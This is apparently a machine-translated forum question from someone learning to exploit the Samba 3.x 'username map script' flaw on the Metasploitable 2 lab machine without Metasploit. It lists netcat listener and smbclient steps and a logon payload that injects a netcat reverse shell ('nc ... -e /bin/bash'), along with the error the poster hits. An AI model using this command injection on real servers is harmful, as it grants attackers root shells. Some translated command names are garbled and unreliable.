Estoy tratando de explotar Metasploitable 2 sin el uso de Metasploit, con el objetivo de aprender. En este caso, me estoy enfocando en Samba 3.x (Puerto TCP 139, 445)
En este enlace enlace se explican dos métodos diferentes para explotar esta máquina después de que un escaneo de nmap revela puertos TCP 139 y 445 abiertos, que ejecutan la versión 3.x de Samba.
El segundo método explica que
Esta vulnerabilidad aprovecha la funcionalidad de "script de mapa de nombre de usuario" de Samba. No se filtra la entrada del usuario, por lo que un atacante podría conectarse a una sesión SMB y usar metacaracteres de shell como entrada para el nombre de usuario, lo que provocaría que los comandos se ejecutaran en el sistema remoto. Esto podría permitir al atacante obtener un shell remoto para la máquina víctima con acceso de raíz.
Mi problema surge cuando se usa Metasploit, como se usa en:
Finalmente encontré este video enlace que evita Metasploit pero no me funciona, donde sigue (Kali = 192.168.200.1; Metasploitable2 = 192.168.200.130):
-
En la ventana de Terminal 1, configuramos netcat para escuchar:
netcat -nlvp 4444
-
En la ventana de Terminal 2, verificamos el recurso compartido
smbclient -L //192.168.200.130
-
Nos centramos en la carpeta tmp y conectamos (Terminal 2):
smbclient //192.168.200.130/tmp
-
Finalmente, obtenemos "smb: >" donde el comando "inicio de sesión" se utiliza para revertir la conexión con Kali, como
smb: > iniciar sesión "/ =
nc 192.168.200.1 4444 -e /bin/bash
"
Este último punto no me funciona con el siguiente mensaje de error "error en la configuración de la sesión: NT_STATUS_NO_MEMORY".
Es difícil para mí encontrar un buen manual que explique el comando de "inicio de sesión". Intenté cambiar la forma en que se usa netcat:
En el punto 1. Escribo
smb: \> nc -nlvp 4444 -e /bin/bash
En el punto 4. Escribo
smb: \> logon "/='nc 192.168.200.1 4444 -e /bin/bash'"
Los mismos resultados. Mismo mensaje de error.
Realmente intenté hacerlo solo, pero no pude. Le agradecería que me ayudara.
¡Gracias de antemano!